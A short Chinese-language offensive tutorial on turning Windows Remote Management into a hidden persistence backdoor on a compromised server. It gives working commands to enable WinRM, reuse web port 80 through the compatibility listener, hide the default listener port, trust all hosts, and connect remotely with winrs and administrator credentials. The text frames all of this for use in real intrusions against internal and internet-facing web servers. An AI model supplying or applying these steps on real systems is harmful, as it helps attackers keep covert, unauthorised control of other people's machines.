Winrm后门在实战中的巧妙应用

winrm后门在实战中的巧妙应用

在权限维持阶段，有很多方法来做权限稳固，但是对于一台服务器来讲，我们可以利用端口复用打造隐蔽winrm后门，从而对机器进行稳定控制。

1.winrm相关介绍

winrm全称是windows remote management,Windows 远程管理（WinRM）是 WS 管理协议的 Microsoft 实现，WS 管理协议是一种基于简单对象访问协议（SOAP）的标准防火墙友好型协议，允许来自不同供应商的硬件和操作系统进行互操作。

WS 管理协议规范为系统提供了一种跨 IT 基础结构访问和交换管理信息的常用方法。WinRM 和智能平台管理接口（IPMI）以及事件收集器是 Windows 硬件管理功能的组件。
简单来说，我们可以通过winrm脚本对象，或者命令行工具远程命令来对计算机进行操作。

2.打造winrm隐蔽后门的过程

对于WinRM来说，默认端口为 5985/tcp (HTTP) 和 5986/tcp (HTTPS)
在server2012之后，WinRM都是默认开启的

（1）首先开启Winrm服务

winrm quickconfig ‐q

默认开启的，但是对于低版本如win7和server我们则需要手动进行开启，开启之后使用命令进行查询开启情况

netsh http show servicestate

我们可以看到5985（http）端口和5986（https）端口已经成功开启
到这一步就可以进行端口复用的相关操作了
首先开启80端口监听，其与现有的web服务端口不冲突

winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}

查询开启结果

winrm e winrm/config/listener

针对server2012以上的版本，5985端口默认开启，如果是低版本需要对端口进行隐匿，只开启80端口的监听

winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}

（2）后门利用

在实战中，winrm后门可以有以下利用场景
1.针对内网环境中不出网的web服务器打造隐匿后门
2.对于能够出网的web服务器利用公网打造后门，进行连接
本地利用方法如下：

# 启动winrm
winrm quickconfig ‐q
# 设置信任主机地址
winrm set winrm/config/Client @{TrustedHosts="*"}

本地需要添加对远程主机的信任
利用powershell进行添加

set-item wsman:\localhost\Client\TrustedHosts -value 192.168.80.26

这样进行连接即可
本地连接命令如下

winrs ‐r:http://url ‐u:administrator ‐p:Password [命令]

除了windows版本的winrm，还可以使用linux下evil-winrm进行远程管理windows。这里只给大家提供一种思路，详细过程就不一一展示了。通过winrm后门打造，我们可以复用其80或者443端口进行远程主机管理。